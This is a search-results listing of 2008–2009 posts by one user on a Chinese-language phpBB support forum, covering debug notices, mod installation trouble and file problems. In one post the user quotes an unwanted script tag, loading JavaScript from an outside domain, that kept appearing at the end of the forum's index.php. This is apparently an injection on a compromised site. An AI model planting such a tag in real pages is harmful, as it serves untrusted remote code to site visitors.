有 30 筆資料符合您搜尋的條件
- 2009-08-02 23:39
- 版面: [3.0.x] 安裝與使用
- 主題: 關於系統 BeBug 的訊息求解
- 回覆: 2
- 觀看: 3350
Re: 關於系統 BeBug 的訊息求解
部分頁面最上頭總會出現以下代碼 或者是某位會員他的發文都會出現這樣的代碼 經檢查後,/includes/functions_profile_fields.php 與 /includes/functions.php 與最原始檔案內容並無二異 實測 IE 與 PCMAN 這兩種瀏覽器都會出現這樣的問題 請教這應該是哪方面出了錯誤呢? 感謝您百忙之中抽空回答 感謝 DeBug 代碼: [phpBB Debug] PHP Notice: in file /includes/functions_profile_fields.php on line 492: gmmktime(): Windows ...
- 2009-08-02 14:13
- 版面: [3.0.x] 安裝與使用
- 主題: 關於系統 BeBug 的訊息求解
- 回覆: 2
- 觀看: 3350
關於系統 BeBug 的訊息求解
部分頁面最上頭總會出現以下代碼 或者是某位會員他的發文都會出現這樣的代碼 經檢查後,/includes/functions_profile_fields.php 與 /includes/functions.php 與最原始檔案內容並無二異 實測 IE 與 PCMAN 這兩種瀏覽器都會出現這樣的問題 請教這應該是哪方面出了錯誤呢? 感謝您百忙之中抽空回答 感謝 DeBug 代碼: [phpBB Debug] PHP Notice: in file /includes/functions_profile_fields.php on line 492: gmmktime(): Windows d...
- 2009-05-17 22:49
- 版面: [3.0.x] 安裝與使用
- 主題: 部分檔案出現奇怪代碼
- 回覆: 5
- 觀看: 4505
Re: 部分檔案出現奇怪代碼
好,我再連絡廠商看看
至於 config 的屬性它好像無法更改的樣子

更動後出現

非常感謝二位的指導!
- 2009-05-17 22:29
- 版面: [3.0.x] 安裝與使用
- 主題: 部分檔案出現奇怪代碼
- 回覆: 5
- 觀看: 4505
- 2009-05-17 18:04
- 版面: [3.0.x] 安裝與使用
- 主題: 部分檔案出現奇怪代碼
- 回覆: 5
- 觀看: 4505
部分檔案出現奇怪代碼
今天凌晨約三點多時網站首頁上頭出現了幾行 Debug 的訊息,然後首頁整個亂成一團 主要就是在 /includes/session.php 裡第 942 行出現問題 header('Set-Cookie: ' . $name_data . (($cookietime) ? '; expires=' . $expire : '') . '; path=' . $config['cookie_path'] . $domain . ((!$config['cookie_secure']) ? '' : '; secure') . '; HttpOnly', false); } 出問題的檔案為 /...
- 2009-01-03 15:34
- 版面: [3.0.x] 外掛問題討論
- 主題: [問題] 有關首頁 --最多瀏覽 最多回覆 ----外掛
- 回覆: 9
- 觀看: 7739
Re: [問題] 有關首頁 --最多瀏覽 最多回覆 ----外掛
引言過長恕刪 大大....那是我想要改成 竹貓 背景淡淡藍畫面 而不是 滑鼠移過去 文字背景 ORZ ...因為背景是全白的.....{最新主題和熱門主題背景} 然後改錯的......全紅 挖類ㄟㄟ :o :o 要從哪修改呢??大大知道嗎?? ●主機作業系統:Windows VISTA ●快速架站程式:無 ●您的上網方式:ADSL ●您安裝的程式:Apache + php5 + MySQL 5.0.51a ●您的 phpBB 版本:phpBB 3.0.4 ●您的 domain (網域名稱) : king.site40.net ●您的 phpBB 連結網址: http://king.site4...
- 2009-01-03 15:12
- 版面: [3.0.x] 外掛問題討論
- 主題: [問題] 有關首頁 --最多瀏覽 最多回覆 ----外掛
- 回覆: 9
- 觀看: 7739
Re: [問題] 有關首頁 --最多瀏覽 最多回覆 ----外掛
引言過長恕刪 其實就在不久以前我也向您一樣在站上到處找人問問題 剛開始也是有很多觀念上的不暸解,導致安裝修改常常失敗 其實都是卡在一個觀念上的問題。突破了這個瓶頸後,接下來應該會有幾步路能夠走得較順利 直到再遇到下一個瓶頸 保有一顆願意研究的心,以及有舉一反三的智慧,其實這學習之路就並不難走 因為看您站上好像沒有安裝過外掛,所以才多花了點時間一步步的作導引建議 事實上這些工作站上都已經有人做過了,所以一些前輩的回答才都較簡短精要 不過偶爾這類型的回答也才能夠激發學習者繼續下去研究的心 常會讓人在看不懂回答的情況下無意中自己的研究空間又更加大。同樣的收穫也更大 見仁見智 剛到貴站上去看了 當...
- 2009-01-03 12:56
- 版面: [3.0.x] 外掛問題討論
- 主題: [問題] 有關首頁 --最多瀏覽 最多回覆 ----外掛
- 回覆: 9
- 觀看: 7739
Re: [問題] 有關首頁 --最多瀏覽 最多回覆 ----外掛
大大.....我有試過 toplist_102 檔案 下在下來解壓縮 然後 把 toplist.php 上傳至root第一層跟 index同層下 這樣就好嗎??還是要連同所有解壓縮出來的檔案全部上傳阿!!! :$ :$ :$ 有看沒有懂,試了試都沒結果耶!!! 你可以在這更鞋繫回覆我其教學QQ 謝謝你!!!! 我是php新手小白!!!請多點耐心謝謝 ●主機作業系統:Windows VISTA ●快速架站程式:無 ●您的上網方式:ADSL ●您安裝的程式:Apache + php5 + MySql ●您的 phpBB 版本:phpBB 3.0.X ●您的 domain (網域名稱) : kin...
- 2008-12-12 15:03
- 版面: [3.0.x] 安裝與使用
- 主題: 論壇 index.php 出現奇怪代碼導致程式錯誤
- 回覆: 4
- 觀看: 3804
Re: 論壇 index.php 出現奇怪代碼導致程式錯誤
您提到的已安裝外掛, 應該不會造成您提到的問題; 若不放心的話, 則先移除竹貓的 "Top5 List v1.0.2". 不太了解您是如何 "擷取" "出錯的 index.php" "代碼"? 建議您: 補充說明. 嗯~就如同下圖示 原始 index.php ↓ http://yanny.myweb.hinet.net/877.jpg 出錯後的 index.php ↓ http://yanny.myweb.hinet.net/878.jpg 如紅框中的一些函數代碼英文字都會自動變成小寫 很奇怪的現象不知道,我想這...
- 2008-12-12 03:11
- 版面: [3.0.x] 安裝與使用
- 主題: 論壇 index.php 出現奇怪代碼導致程式錯誤
- 回覆: 4
- 觀看: 3804
Re: 論壇 index.php 出現奇怪代碼導致程式錯誤
建議您: 1. 徹底移除您最近安裝的外掛 (檔案與新增之資料表). 2. 若該 "程式碼" 已寫入 index.php, 則移除之. 抱歉這兩天比較忙沒來得及感謝指導 原始 index.php 底下共新增三段代碼如下: 一個是 Top Posters on Index http://phpbb-tw.net/phpbb/viewtopic.php?f=132&t=51637 加了 //Generate top poster list if enabled if ($config['amount_top_posters']) { if (!function_exis...
- 2008-12-10 01:08
- 版面: [3.0.x] 安裝與使用
- 主題: 論壇 index.php 出現奇怪代碼導致程式錯誤
- 回覆: 4
- 觀看: 3804
論壇 index.php 出現奇怪代碼導致程式錯誤
不知道為什麼 每次差不多到了晚上十一點到十二點之間站台上總容易出現錯誤,然後首頁就一片空白 今天像是抓到了這個錯誤,只是不知道為何會這樣子 也就是首頁 index.php 最下面都會自動出現這行代碼 ?><script language="javascript" src="http://www.css.vu.cx/css.js?width=700&height=600&keyword=uf556"></script> 比照正常運作時的 index.php 卻不見這行代碼 他是出現在 index.php 的 page_footer();...
- 2008-11-27 05:17
- 版面: [3.0.x] 外掛問題討論
- 主題: Thank Post Mod 0.2.0 的小麻煩....
- 回覆: 2
- 觀看: 3281
Re: Thank Post Mod 0.2.0 的小麻煩....
小弟不才,跑去大陸 phpbb 網站去看到了這個 mod 相關網址: http://www.phpbb.com/community/viewtopic.php?f=70&t=1115275 因為一直很想要這個功能,遂就不自量力的想挑戰安裝 結果失敗.... 而失敗後卻產生問題 在確認所以已更改過的檔案都已經還原,並且ACP>維護,也做了資料庫還原 但是當這一切動作結束後,再進ACP卻顯示 一般性錯誤 Language file thanks.php couldn't be opened. 然後沒辦法,只好再把thanks.php丟回/language/zh_tw/acp/ 卻又可...
- 2008-11-26 10:22
- 版面: [3.0.x] 非官方認證外掛
- 主題: [外掛] [phpbb3] Simple Topic Prefix (簡易主題類型)
- 回覆: 5
- 觀看: 14861
[Beta]簡易主題MOD
################################################################################# MOD名稱:Simple Topic Prefix Plus 簡易主題類型改寫版 描述:在標題輸入框前加入一個下拉選擇框,通過選擇將類型前缀(?)添加到主題本文的前面 版本:0.9.Beta 1 適用phpBB版本:3.0.RC8 提供的模板:proSilver 提供的語言:英文、中文簡體 原作者jwxie 、IOsetting ##################################################...
- 2008-11-26 08:17
- 版面: [3.0.x] 外掛問題討論
- 主題: Thank Post Mod 0.2.0 的小麻煩....
- 回覆: 2
- 觀看: 3281
Thank Post Mod 0.2.0 的小麻煩....
小弟不才,跑去大陸 phpbb 網站去看到了這個 mod 相關網址: http://www.phpbb.com/community/viewtopic.php?f=70&t=1115275 因為一直很想要這個功能,遂就不自量力的想挑戰安裝 結果失敗.... 而失敗後卻產生問題 在確認所以已更改過的檔案都已經還原,並且ACP>維護,也做了資料庫還原 但是當這一切動作結束後,再進ACP卻顯示 一般性錯誤 Language file thanks.php couldn't be opened. 然後沒辦法,只好再把thanks.php丟回/language/zh_tw/acp/ 卻又可以...
- 2008-11-22 15:45
- 版面: [3.0.x] 外掛問題討論
- 主題: 關於simple_points_system_0.5.1的安裝問題(已解決)
- 回覆: 5
- 觀看: 5298
Re: 關於simple_points_system_0.5.1的安裝問題
MySQL 傳回: #1062 - Duplicate entry 'points_enable' for key 1 那錯誤訊息表示, 您在執行 db_update.php 以前, 已經有新增相關欄位. 此已新增的欄位, 是位於資料表 phpbb_config 之內. 一般而言, 若有備份資料庫, 則還原覆蓋, 比較不會出錯. 否則, 您得小心, 自行移除已經新增的資料表或欄位. 此外掛 0.4.0 與 0.5.1 差異極大; 若要試用, 則建議直接安裝最新版. P.S. 此外掛尚在發展中, 不建議使用在正常運作的論壇. 好,謝謝建議,與解惑觀念上的問題 昨天裝起來其實也覺得實際效用不大,...